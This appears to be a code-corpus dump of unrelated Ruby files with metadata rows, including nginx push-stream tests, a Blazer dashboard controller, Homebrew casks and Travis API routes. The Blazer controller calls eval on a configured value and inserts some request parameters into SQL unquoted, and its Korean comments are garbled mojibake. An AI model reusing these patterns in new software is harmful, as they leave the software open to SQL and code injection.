expect(body).to match_the_pattern(/"channels": 1, "wildcard_channels": 0, "published_messages": 1, "stored_messages": 1, "messages_in_trash": 0, "channels_in_delete": 0, "channels_in_trash": 0, "subscribers": 0, "uptime": [0-9]*, "by_worker": \[\r\n/)
expect(body).to match_the_pattern(/\{"pid": "[0-9]*", "subscribers": 0, "uptime": [0-9]*\}/)
socket.print("DELETE /pub?id=#{channel}_1 HTTP/1.1\r\nHost: test\r\n\r\n")
headers, body = read_response_on_socket(socket)
expect(headers).to include("HTTP/1.1 404 Not Found")
headers, body = get_in_socket("/channels-stats?id=ALL", socket)
expect(body).to match_the_pattern(/"hostname": "[^"]*", "time": "\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}", "channels": 1, "wildcard_channels": 0, "uptime": [0-9]*, "infos": \[\r\n/)
expect(body).to match_the_pattern(/"channel": "#{channel}", "published_messages": 1, "stored_messages": 1, "subscribers": 0}\r\n/)
headers, body = get_in_socket("/pub?id=#{channel}", socket)
expect(body).to eql("{\"channel\": \"#{channel}\", \"published_messages\": 1, \"stored_messages\": 1, \"subscribers\": 0}\r\n")
headers, body = post_in_socket("/pub?id=#{channel}/broad_#{channel}", content, socket, {:wait_for => "}\r\n"})
expect(body).to match_the_pattern(/"hostname": "[^"]*", "time": "\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}", "channels": 1, "wildcard_channels": 1, "uptime": [0-9]*, "infos": \[\r\n/)
expect(body).to match_the_pattern(/"channel": "#{channel}", "published_messages": 2, "stored_messages": 2, "subscribers": 0},\r\n/)
expect(body).to match_the_pattern(/"channel": "broad_#{channel}", "published_messages": 1, "stored_messages": 1, "subscribers": 0}\r\n/)
headers, body = get_in_socket("/channels-stats?id=#{channel}", socket)
expect(body).to match_the_pattern(/{"channel": "#{channel}", "published_messages": 2, "stored_messages": 2, "subscribers": 0}\r\n/)
socket.print("DELETE /pub?id=#{channel} HTTP/1.1\r\nHost: test\r\n\r\n")
headers, body = read_response_on_socket(socket)
expect(headers).to include("X-Nginx-PushStream-Explain: Channel deleted.")
socket.close
end
end
it "should accept subscribe many times using the same socket" do
channel = 'ch_test_subscribe_with_keepalive'
body_prefix = 'message to be sent'
get_messages = "GET /sub/#{channel} HTTP/1.1\r\nHost: test\r\n\r\n"
nginx_run_server(config.merge(:store_messages => 'off', :subscriber_mode => 'long-polling'), :timeout => 5) do |conf|
socket = open_socket(nginx_host, nginx_port)
socket_pub = open_socket(nginx_host, nginx_port)
1.upto(500) do |j|
socket.print(get_messages)
post_in_socket("/pub?id=#{channel}", "#{body_prefix} #{j.to_s.rjust(3, '0')}", socket_pub, {:wait_for => "}\r\n"})
headers, body = read_response_on_socket(socket, "\r\n0\r\n\r\n")
expect(body).to eql("16\r\nmessage to be sent #{j.to_s.rjust(3, '0')}\r\n0\r\n\r\n")
end
socket.close
socket_pub.close
end
end
end
| 48.428571 | 257 | 0.62925 |
1ce7e088c563b96793ff34a20108dcd17dd6d547 | 138 | class ProfessionalSpecializationsResume < ApplicationRecord
belongs_to :professional_specialization
belongs_to :resume, touch: true
end
| 27.6 | 59 | 0.869565 |
03f872d812a128392842b40ded024332994ae2f9 | 7,148 | module Blazer
class BaseController < ApplicationController
# skip filters
filters = _process_action_callbacks.map(&:filter) - [:activate_authlogic]
if Rails::VERSION::MAJOR >= 5
skip_before_action(*filters, raise: false)
skip_after_action(*filters, raise: false)
skip_around_action(*filters, raise: false)
else
skip_action_callback *filters
end
protect_from_forgery with: :exception
before_action :load_service
if ENV["BLAZER_PASSWORD"]
http_basic_authenticate_with name: ENV["BLAZER_USERNAME"], password: ENV["BLAZER_PASSWORD"]
end
if Blazer.before_action
before_action Blazer.before_action.to_sym
end
layout "blazer/application"
private
def process_vars(statement, data_source)
(@bind_vars ||= []).concat(Blazer.extract_vars(statement)).uniq!
awesome_variables = {}
@bind_links = @bind_vars
@bind_vars = @bind_vars.reject{|var| var.end_with? '_table'}.reject{|var| var.start_with? 'gcs_file_link_'} # λμ λ³μ
@bind_vars.each do |var|
params[var] ||= Blazer.data_sources[data_source].variable_defaults[var] # νμ¬ μ°λ¦¬μͺ½μμλ μ°μ§μμ
awesome_variables[var] ||= Blazer.data_sources[data_source].awesome_variables[var]
end
@success = @bind_vars.all? { |v| params[v] } # parameter λ‘ κ° λμ λ³μλ€μ΄ λμ΄μλμ§ μ²΄ν¬. 맨μ²μ νμ΄μ§μ μ§μ
ν λλ νμμλ€ μ¬κΈ°μ μμ
if @success
@bind_vars.each do |var| #bind_vars λ³μμ paramμΌλ‘ λμ΄μ¨ κ°λ€μ μ²λ¦¬νλ€.
value = params[var].presence
if value
if ["start_time", "end_time"].include?(var)
value = value.to_s.gsub(" ", "+") # fix for Quip bug
end
if var.end_with?("_at")
begin
value = Blazer.time_zone.parse(value)
rescue
# do nothing
end
end
if value =~ /\A\d+\z/
value = value.to_i
elsif value =~ /\A\d+\.\d+\z/
value = value.to_f
end
end
variable = awesome_variables[var]
if variable.present? && variable['type'] == 'condition'
if value.present? && variable['style'] == 'checkbox'
statement.gsub!("{#{var}}"," #{value.join(' or ')} ")
elsif value.present? && variable['style'] == 'file'
table_name = "wheelhouse_temp.#{value}"
statement.gsub!("{#{var}}", table_name)
elsif value.present? || variable['style'] == 'text'
statement.gsub!("{#{var}}", value.to_s)
else
statement.gsub!("{#{var}}", 'true')
end
else
statement.gsub!("{#{var}}", ActiveRecord::Base.connection.quote(value)) #blazer.ymlμ μ μλμ΄ μμ§ μλ λ³μμ λν΄μλ valueκ°μΌλ‘ μΉνν΄μ μ²λ¦¬νλ€.
end
end
end
end
#gcs νμΌ λ§ν¬λ‘ λΉ
쿼리μ μ μ¬ν΄μ μ¬μ©νλ€.
def process_file_link(statement, data_source)
awesome_variables = {}
@bind_links = @bind_links.select{|var| var.start_with? 'gcs_file_link_'}
@bind_links = @bind_links.select{|var| params[var] != '' }
return [] unless @bind_links.present?
@bind_links.each do |var|
params[var] ||= Blazer.data_sources[data_source].variable_defaults[var]
awesome_variables[var] ||= Blazer.data_sources[data_source].awesome_variables[var]
end
@success = @bind_links.all? { |v| params[v] }
if @success
@bind_links.each do |var|
awesome_variables[var] ||= Blazer.data_sources[data_source].awesome_variables[var]
end
@bind_links.each do |var|
variable = awesome_variables[var]
value = variable['value'][0]['table_name']
statement.gsub!("{#{var}}", value )
end
end
end
def process_tables(statement, data_source)
(@bind_tables ||= []).concat(Blazer.extract_vars(statement))
awesome_variables = {}
@bind_tables = @bind_tables.select{|r| (r.end_with? '_table') || ((r.start_with? 'gcs_file_link_') && (params[r] == '')) }
return unless @bind_tables.present?
@bind_tables.each do |var|
awesome_variables[var] ||= Blazer.data_sources[data_source].awesome_variables[var]
end
@bind_tables.each do |var|
variable = awesome_variables[var]
if var.start_with? 'gcs_file_link_'
statement.gsub!("{#{var}}", 'empty' )
elsif variable.present? && variable['type'] == 'table'
prefix_table = variable['value']['name']
suffix = eval(variable['value']['suffix'])
value =prefix_table + suffix
statement.gsub!("{#{var}}", value )
end
end
end
def parse_smart_variables(var, data_source)
smart_var_data_source =
([data_source] + Array(data_source.settings["inherit_smart_settings"]).map { |ds| Blazer.data_sources[ds] }).find { |ds| ds.smart_variables[var] }
if smart_var_data_source
query = smart_var_data_source.smart_variables[var]
if query.is_a? Hash
smart_var = query.map { |k,v| [v, k] }
elsif query.is_a? Array
smart_var = query.map { |v| [v, v] }
elsif query
result = smart_var_data_source.run_statement(query)
smart_var = result.rows.map { |v| v.reverse }
error = result.error if result.error
end
end
[smart_var, error]
end
def parse_awesome_variables(var, data_source)
# awesome_var_data_source =
# ([data_source] + Array(data_source.settings["inherit_smart_settings"]).map { |ds| Blazer.data_sources[ds] }).find { |ds| ds.smart_variables[var] }
awesome_var_data_source =
([data_source] + Array(data_source.settings["inherit_smart_settings"]).map { |ds| Blazer.data_sources[ds] }).find { |ds| ds.awesome_variables[var] } # μ΄ λΆλΆλ μΆν μμ
if awesome_var_data_source
query = awesome_var_data_source.awesome_variables[var]
if query.is_a? Hash
awesome_var = query
elsif query
result = awesome_var_data_source.run_statement(query)
awesome_var = result.rows.map { |v| v.reverse }
error = result.error if result.error
end
end
[awesome_var, error]
end
def variable_params
params.except(:controller, :action, :id, :host, :query, :dashboard, :query_id, :query_ids, :table_names, :authenticity_token, :utf8, :_method, :commit, :statement, :data_source, :name, :fork_query_id, :blazer, :run_id).permit!
end
helper_method :variable_params
def blazer_user
send(Blazer.user_method) if Blazer.user_method && respond_to?(Blazer.user_method)
end
helper_method :blazer_user
def render_errors(resource)
@errors = resource.errors
action = resource.persisted? ? :edit : :new
render action, status: :unprocessable_entity
end
# do not inherit from ApplicationController - #120
def default_url_options
{}
end
# TODO λμ€μλ λ°λΌλ³΄λ data_sourceμ λ°λΌ ν΄λΌμ°λ μλΉμ€λ₯Ό μμ±νλλ‘ νλ€.
def load_service(service = CloudService.new('google'))
@cloud ||= service.cloud
end
end
end
| 36.10101 | 232 | 0.615417 |
ff235304c964b4ad9bec0f1eb669468dbd047060 | 1,857 | # frozen_string_literal: true
module VcReader
class LinkRepository
attr_accessor :last_id, :links
attr_reader :per_page
# @param file_manager [FileManager]
# @param per_page [Integer]
def initialize(file_manager = FileManager.instance, per_page = 4)
@file_manager = file_manager
@saved_links = file_manager.load_file
@last_id = nil
@links = []
@per_page = per_page
@cursor = nil
end
# @param index [Integer]
# @return [VCLink]
# @raise [StandardError]
def find_by_index(index)
link = @links[index - 1] || nil
raise NoLinkError, index if link.nil?
link
end
# @param index [Integer]
# @return [VCLink, NilClass]
def find_by_index_and_mark(index)
link = find_by_index(index)
link.visited = true
saved_links << link.href
link
end
# rubocop:disable Metrics/AbcSize
# @param links [Array<Node>]
def fill_links(array)
@cursor = cursor.nil? ? 1 : cursor + per_page
current_step = links.size
array
.map { |i| VCLink.new(i) }
.each_with_index do |link, index|
link.index = index + 1 + current_step
link.visited = true if saved_links.include?(link.href)
@links << link
end
nil
end
# rubocop:enable Metrics/AbcSize
# NOTE: it changes cursor to back
def cursor_to_prev
@cursor = case cursor
when nil then nil
when 1 then 1
else
cursor - per_page
end
nil
end
def current_links
from = cursor - 1
to = cursor + per_page - 1
links[from..to]
end
def save_data
file_manager.save_file(saved_links.uniq)
end
private
attr_reader :file_manager, :saved_links, :cursor
end
end
| 23.2125 | 69 | 0.59343 |
03d53d4f2de85d9644e0e47894d31ff1a64c1ae9 | 2,085 | # frozen_string_literal: true
#
# bool2str.rb
#
module Puppet::Parser::Functions
newfunction(:bool2str, type: :rvalue, doc: <<-DOC
@summary
Converts a boolean to a string using optionally supplied arguments.
The optional second and third arguments represent what true and false will be
converted to respectively. If only one argument is given, it will be
converted from a boolean to a string containing 'true' or 'false'.
@return
The converted value to string of the given Boolean
**Examples of usage**
```
bool2str(true) => 'true'
bool2str(true, 'yes', 'no') => 'yes'
bool2str(false, 't', 'f') => 'f'
```
Requires a single boolean as an input.
> *Note:*
since Puppet 5.0.0 it is possible to create new data types for almost any
datatype using the type system and the built-in
[`String.new`](https://puppet.com/docs/puppet/latest/function.html#boolean-to-string)
function is used to convert to String with many different format options.
```
notice(String(false)) # Notices 'false'
notice(String(true)) # Notices 'true'
notice(String(false, '%y')) # Notices 'yes'
notice(String(true, '%y')) # Notices 'no'
```
DOC
) do |arguments|
unless arguments.size == 1 || arguments.size == 3
raise(Puppet::ParseError, "bool2str(): Wrong number of arguments given (#{arguments.size} for 3)")
end
value = arguments[0]
true_string = arguments[1] || 'true'
false_string = arguments[2] || 'false'
klass = value.class
# We can have either true or false, and nothing else
unless [FalseClass, TrueClass].include?(klass)
raise(Puppet::ParseError, 'bool2str(): Requires a boolean to work with')
end
unless [true_string, false_string].all? { |x| x.is_a?(String) }
raise(Puppet::ParseError, 'bool2str(): Requires strings to convert to')
end
return value ? true_string : false_string
end
end
# vim: set ts=2 sw=2 et :
| 32.076923 | 104 | 0.629736 |
2648bc88ca2a7d208068daaca57144be82e3a152 | 301 | # frozen_string_literal: true
# Migration to create media table
class CreateMedia < ActiveRecord::Migration[6.1]
def change
create_table :media do |t|
t.references :client, null: false, foreign_key: true
t.string :name, null: false
t.timestamps null: false
end
end
end
| 21.5 | 58 | 0.697674 |
08ff0dfc58ae75fc718c2bd48e3e18a0bd4c2c9c | 212 | class AddTransactionerIdToSpreeStoreCredits < ActiveRecord::Migration
def change
add_column :spree_store_credits, :transactioner_id, :integer
add_index :spree_store_credits, :transactioner_id
end
end
| 30.285714 | 69 | 0.820755 |
79823979e583432d2a721f62460ba6476b33e74f | 135 | class AddHighScoreToDecks < ActiveRecord::Migration[5.1]
def change
add_column :decks, :high_score, :float, default: 0
end
end
| 22.5 | 56 | 0.740741 |
bb75bd19bd7c694c712babe110d38d0979e3b9d6 | 1,602 | class Ry < Formula
desc "Ruby virtual env tool"
homepage "https://github.com/jayferd/ry"
url "https://github.com/jayferd/ry/archive/v0.5.2.tar.gz"
sha256 "b53b51569dfa31233654b282d091b76af9f6b8af266e889b832bb374beeb1f59"
head "https://github.com/jayferd/ry.git"
bottle do
cellar :any_skip_relocation
rebuild 1
sha256 "022769e51adb7393c5b418aef50911e96bb6bc43dfc7d81850b6e71cea7c3a2d" => :mojave
sha256 "7d9631e41ff87b979c1d94ce1bfe1a710dd031e923b447332186678e68a0f523" => :high_sierra
sha256 "2703cd68ac926b7bd8dac25c93054993706d32a4c9857b450eb19f88bdf81530" => :sierra
sha256 "5b324970a3a3c806029241e1c5c453c900f16b3aec8e32bedc5d1a6abb5670c7" => :el_capitan
sha256 "7b8c7549875ff9a303735ffae235f520fd85af5796953ab92949d2ec7d69ecc6" => :yosemite
sha256 "c94e0176f99aaefcdc84ef95c081aa348177662e1b7f20d429a5c56a5b98ef40" => :mavericks
end
depends_on "ruby-build" => :recommended
depends_on "bash-completion" => :recommended
def install
ENV["PREFIX"] = prefix
ENV["BASH_COMPLETIONS_DIR"] = etc/"bash_completion.d"
ENV["ZSH_COMPLETIONS_DIR"] = share/"zsh/site-functions"
system "make", "install"
end
def caveats; <<~EOS
Please add to your profile:
which ry &>/dev/null && eval "$(ry setup)"
If you want your Rubies to persist across updates you
should set the `RY_RUBIES` variable in your profile, i.e.
export RY_RUBIES="#{HOMEBREW_PREFIX}/var/ry/rubies"
EOS
end
test do
ENV["RY_RUBIES"] = testpath/"rubies"
system bin/"ry", "ls"
assert_predicate testpath/"rubies", :exist?
end
end
| 34.826087 | 93 | 0.748439 |
e94230e9e537bf74cacaf7f3d0b7527e21361e67 | 6,602 | module Travis::API::V3
module Routes
require 'travis/api/v3/routes/dsl'
extend DSL
resource :broadcasts do
route '/broadcasts'
get :for_current_user
end
resource :build do
capture id: :digit
route '/build/{build.id}'
get :find
post :cancel, '/cancel'
post :restart, '/restart'
resource :jobs do
route '/jobs'
get :find
end
resource :stages do
route '/stages'
get :find
end
end
resource :builds do
route '/builds'
get :for_current_user
end
resource :jobs do
route '/jobs'
get :for_current_user
end
resource :cron do
capture id: :digit
route '/cron/{cron.id}'
get :find
delete :delete
end
enterprise do
resource :enterprise_license do
get :find
route '/enterprise_license'
end
end
resource :installation do
route '/installation/{installation.github_id}'
get :find
end
resource :job do
capture id: :digit
route '/job/{job.id}'
get :find
post :cancel, '/cancel'
post :restart, '/restart'
post :debug, '/debug'
resource :log do
route '/log'
get :find
get :find, '.txt'
delete :delete
end
end
resource :lint do
route '/lint'
post :lint
end
resource :organization do
capture id: :digit
route '/org/{organization.id}'
get :find
resource :preferences do
route '/preferences'
get :for_organization
end
resource :preference do
route '/preference/{preference.name}'
get :for_organization
patch :update
end
end
resource :organizations do
route '/orgs'
get :for_current_user
end
resource :owner do
route '/owner/({owner.login}|{user.login}|{organization.login}|github_id/{owner.github_id})'
get :find
resource :repositories do
route '/repos'
get :for_owner
end
resource :active do
route '/active'
get :for_owner
end
end
resource :repositories do
route '/repos'
get :for_current_user
end
resource :repository do
capture id: :digit, slug: %r{[^/]+%2[fF][^/]+}
route '/repo/({repository.id}|{repository.slug})'
get :find
post :activate, '/activate'
post :deactivate, '/deactivate'
post :migrate, '/migrate'
post :star, '/star'
post :unstar, '/unstar'
hide(patch :update)
resource :branch do
route '/branch/{branch.name}'
get :find
resource :cron do
route '/cron'
get :for_branch
post :create
end
end
resource :branches do
route '/branches'
get :find
end
resource :builds do
route '/builds'
get :find
end
resource :caches do
route '/caches'
get :find
delete :delete
end
resource :crons do
route '/crons'
get :for_repository
end
resource :requests do
route '/requests'
get :find
post :create
end
resource :request do
route '/request/{request.id}'
get :find
resource :messages do
route '/messages'
get :for_request
end
end
resource :user_settings, as: :settings do
route '/settings'
get :for_repository
end
resource :user_setting, as: :setting do
route '/setting/{setting.name}'
get :find
patch :update
end
resource :env_vars do
route '/env_vars'
get :for_repository
post :create
end
resource :env_var do
route '/env_var/{env_var.id}'
get :find
patch :update
delete :delete
end
# This is the key we generate for encryption/decryption etc.
# In V2 it was found at /repos/:repo_id/key
resource :ssl_key, as: :key_pair_generated do
route '/key_pair/generated'
get :find
post :create
end
# This is the key that users may choose to add on travis-ci.com
# In V2 it was found at /settings/ssh_key/:repo_id
resource :key_pair do
route '/key_pair'
get :find
post :create
patch :update
delete :delete
end
resource :email_subscription do
route '/email_subscription'
delete :unsubscribe
post :resubscribe
end
end
resource :user do
capture id: :digit
route '/user/{user.id}'
get :find
post :sync, '/sync'
resource :beta_features do
route '/beta_features'
get :find
end
resource :beta_feature do
route '/beta_feature/{beta_feature.id}'
patch :update
delete :delete
end
resource :beta_migration_requests do
route '/beta_migration_requests'
get :proxy_find
end
resource :beta_migration_request do
route '/beta_migration_request'
post :proxy_create
end
end
hidden_resource :beta_migration_requests do
route '/beta_migration_requests'
get :find
post :create
end
resource :user do
route '/user'
get :current
end
resource :preferences do
route '/preferences'
get :for_user
end
resource :preference do
route '/preference/{preference.name}'
get :find
patch :update
end
hidden_resource :subscriptions do
route '/subscriptions'
get :all
post :create
end
hidden_resource :subscription do
route '/subscription/{subscription.id}'
patch :update_address, '/address'
patch :update_creditcard, '/creditcard'
patch :update_plan, '/plan'
patch :resubscribe, '/resubscribe'
post :cancel, '/cancel'
get :invoices, '/invoices'
end
hidden_resource :trials do
route '/trials'
get :all
post :create
end
hidden_resource :plans do
route '/plans'
get :all
end
if ENV['GDPR_ENABLED']
hidden_resource :gdpr do
route '/gdpr'
post :export, '/export'
delete :purge, '/purge'
end
end
hidden_resource :insights do
route '/insights'
get :metrics, '/metrics'
get :active_repos, '/repos/active'
end
end
end
| 20.251534 | 98 | 0.558922 |
f8fda00823e87c19702309ebe3f0ea8422294bc8 | 876 | cask "nvidia-geforce-now" do
version "2.0.26.116,897C99"
sha256 "f74cafac283b933d05fcf4957e7faad18de05f2a1169993a223a7bea124c3687"
url "https://ota-downloads.nvidia.com/ota/GeForceNOW-release.app_#{version.after_comma}.zip"
appcast "https://ota.nvidia.com/release/available?product=GFN-mac&version=#{version.before_comma}&channel=OFFICIAL",
must_contain: "[]" # Only happens when there are no newer versions
name "NVIDIA GeForce NOW"
desc "Cloud gaming platform"
homepage "https://www.nvidia.com/en-us/geforce/products/geforce-now/"
depends_on macos: ">= :yosemite"
# Renamed for consistency: app name is different in the Finder and in a shell.
app "GeForceNOW.app", target: "NVIDIA GeForce NOW.app"
zap trash: [
"~/Library/Application Support/NVIDIA/GeForceNOW",
"~/Library/Preferences/com.nvidia.gfnpc.mall.helper.plist",
]
end
| 39.818182 | 118 | 0.743151 |
6a5b910adf13fcf91d284e57b9cac09dbc1a9411 | 444 | module IndexTank
class IndexAlreadyExists < StandardError; end
class NonExistentIndex < StandardError; end
class TooManyIndexes < StandardError; end
class MissingFunctionDefinition < StandardError; end
class InvalidApiKey < StandardError; end
class InvalidQuery < StandardError; end
class IndexInitializing < StandardError; end
class InvalidArgument < StandardError; end
class UnexpectedHTTPException < StandardError; end
end
| 37 | 54 | 0.810811 |
f7e06d83b7e4a9c9165f5dc147be41728323593d | 3,583 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "messages_app_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 41.183908 | 102 | 0.759419 |
0363306becdce188ac3e02e0bc78bf46730c046d | 433 | require 'aspose_pdf_cloud'
include AsposePdfCloud
app_key = 'XXXXX'
app_sid = 'XXXXX'
@pdf_api = PdfApi.new(app_key, app_sid)
file_name = 'PdfWithAnnotations.pdf'
# Upload the File
@pdf_api.put_create(file_name, :: File.open('example_data/' + file_name, 'r') { |io| io.read(io.size) })
puts 'Uploaded the File'
opts = {
:folder => @temp_folder
}
response = @pdf_api.get_document_movie_annotations(file_name, opts)
puts response | 27.0625 | 104 | 0.741339 |
084278a2ca9425a473d3e646f5c7ce35d51f145c | 3,731 | require 'rails_helper'
describe Ability do
let(:ability) { Ability.new(admin) }
context 'standard rights' do
let(:admin) { create(:admin, rights: 'standard') }
specify { expect(ability.can?(:manage, admin)).to be true }
specify { expect(ability.can?(:read, Admin.new)).to be false }
specify { expect(ability.can?(:read, MailTemplate)).to be true }
specify { expect(ability.can?(:update, MailTemplate)).to be false }
specify { expect(ability.can?(:manage, Member)).to be false }
specify { expect(ability.can?(:create, Delivery)).to be false }
specify { expect(ability.can?(:read, Member)).to be true }
specify { expect(ability.can?(:destroy, Member)).to be false }
specify { expect(ability.can?(:validate, Member)).to be false }
specify { expect(ability.can?(:deactivate, Member.new(state: 'waiting'))).to be false }
specify { expect(ability.can?(:wait, Member.new(state: 'inactive'))).to be false }
specify { expect(ability.can?(:destroy, ActiveAdmin::Comment)).to be false }
specify { expect(ability.can?(:create, ActiveAdmin::Comment)).to be true }
specify { expect(ability.can?(:destroy, Invoice)).to be false }
end
context 'admin rights' do
let(:admin) { create(:admin, rights: 'admin') }
specify { expect(ability.can?(:manage, admin)).to be true }
specify { expect(ability.can?(:read, Admin.new)).to be true }
specify { expect(ability.can?(:read, MailTemplate)).to be true }
specify { expect(ability.can?(:update, MailTemplate)).to be false }
specify { expect(ability.can?(:create, Member)).to be true }
specify { expect(ability.can?(:update, Member)).to be true }
specify { expect(ability.can?(:destroy, Member)).to be true }
specify { expect(ability.can?(:validate, Member)).to be true }
specify { expect(ability.can?(:manage, Delivery)).to be true }
specify { expect(ability.can?(:deactivate, Member.new(state: 'waiting'))).to be true }
specify { expect(ability.can?(:deactivate, Member.new(state: 'support'))).to be true }
specify { expect(ability.can?(:wait, Member.new(state: 'inactive'))).to be true }
specify { expect(ability.can?(:destroy, ActiveAdmin::Comment)).to be true }
specify { expect(ability.can?(:destroy, Invoice.new)).to be true }
specify { expect(ability.can?(:destroy, Invoice.new(sent_at: Time.current))).to be false }
context 'share price' do
before { Current.acp.update!(share_price: 420) }
specify { expect(ability.can?(:deactivate, Member.new(state: 'waiting'))).to be true }
specify { expect(ability.can?(:deactivate, Member.new(state: 'support'))).to be false }
end
end
context 'superadmin rights' do
let(:admin) { create(:admin, rights: 'superadmin') }
specify { expect(ability.can?(:manage, admin)).to be true }
specify { expect(ability.can?(:manage, Admin.new)).to be true }
specify { expect(ability.can?(:create, MailTemplate)).to be true }
specify { expect(ability.can?(:create, Member)).to be true }
specify { expect(ability.can?(:update, Member)).to be true }
specify { expect(ability.can?(:destroy, Member)).to be true }
specify { expect(ability.can?(:validate, Member)).to be true }
specify { expect(ability.can?(:deactivate, Member.new(state: 'waiting'))).to be true }
specify { expect(ability.can?(:wait, Member.new(state: 'inactive'))).to be true }
specify { expect(ability.can?(:destroy, Invoice.new)).to be true }
specify { expect(ability.can?(:destroy, Invoice.new(sent_at: Time.current))).to be false }
specify { expect(ability.can?(:destroy, BasketSize)).to be false }
specify { expect(ability.can?(:destroy, BasketComplement)).to be false }
end
end
| 53.3 | 94 | 0.672474 |
33ae44d37bd277a5ffbf22adc527bd525ee01ad3 | 3,719 | # frozen_string_literal: true
require "spec_helper"
require "generators/graphql/object_generator"
class GraphQLGeneratorsObjectGeneratorTest < BaseGeneratorTest
tests Graphql::Generators::ObjectGenerator
ActiveRecord::Schema.define do
create_table :test_users do |t|
t.datetime :created_at
t.date :birthday
t.integer :points, null: false
t.decimal :rating, null: false
end
end
# rubocop:disable Style/ClassAndModuleChildren
class ::TestUser < ActiveRecord::Base
end
# rubocop:enable Style/ClassAndModuleChildren
test "it generates fields with types" do
commands = [
# GraphQL-style:
["Bird", "wingspan:Int!", "foliage:[Color]"],
# Ruby-style:
["BirdType", "wingspan:!Integer", "foliage:[Types::ColorType]"],
# Mixed
["BirdType", "wingspan:!Int", "foliage:[Color]"],
]
expected_content = <<-RUBY
# frozen_string_literal: true
module Types
class BirdType < Types::BaseObject
field :wingspan, Integer, null: false
field :foliage, [Types::ColorType]
end
end
RUBY
commands.each do |c|
prepare_destination
run_generator(c)
assert_file "app/graphql/types/bird_type.rb", expected_content
end
end
test "it generates fields with namespaced types" do
commands = [
# GraphQL-style:
["Bird", "wingspan:Int!", "foliage:[Color]"],
# Ruby-style:
["BirdType", "wingspan:!Integer", "foliage:[Types::ColorType]"],
# Mixed
["BirdType", "wingspan:!Int", "foliage:[Color]"],
].map { |c| c + ["--namespaced-types"]}
expected_content = <<-RUBY
# frozen_string_literal: true
module Types
class Objects::BirdType < Types::BaseObject
field :wingspan, Integer, null: false
field :foliage, [Types::ColorType]
end
end
RUBY
commands.each do |c|
prepare_destination
run_generator(c)
assert_file "app/graphql/types/objects/bird_type.rb", expected_content
end
end
test "it generates namespaced classifed file" do
run_generator(["books/page"])
assert_file "app/graphql/types/books/page_type.rb", <<-RUBY
# frozen_string_literal: true
module Types
class Books::PageType < Types::BaseObject
end
end
RUBY
end
test "it makes Relay nodes" do
run_generator(["Page", "--node"])
assert_file "app/graphql/types/page_type.rb", <<-RUBY
# frozen_string_literal: true
module Types
class PageType < Types::BaseObject
implements GraphQL::Types::Relay::Node
end
end
RUBY
end
test "it generates objects based on ActiveRecord schema, with namespaced types" do
run_generator(["TestUser", "--namespaced-types"])
assert_file "app/graphql/types/objects/test_user_type.rb", <<-RUBY
# frozen_string_literal: true
module Types
class Objects::TestUserType < Types::BaseObject
field :id, ID, null: false
field :created_at, GraphQL::Types::ISO8601DateTime
field :birthday, GraphQL::Types::ISO8601Date
field :points, Integer, null: false
field :rating, Float, null: false
end
end
RUBY
end
test "it generates objects based on ActiveRecord schema with additional custom fields" do
run_generator(["TestUser", "name:!String", "email:!Citext", "settings:jsonb"])
assert_file "app/graphql/types/test_user_type.rb", <<-RUBY
# frozen_string_literal: true
module Types
class TestUserType < Types::BaseObject
field :id, ID, null: false
field :created_at, GraphQL::Types::ISO8601DateTime
field :birthday, GraphQL::Types::ISO8601Date
field :points, Integer, null: false
field :rating, Float, null: false
field :name, String, null: false
field :email, String, null: false
field :settings, GraphQL::Types::JSON
end
end
RUBY
end
end
| 26.564286 | 91 | 0.693735 |
6a0b6e5ceccf2216ca738ac6fc15debca699f794 | 3,657 | #
# Copyright:: Copyright (c) 2017 GitLab Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
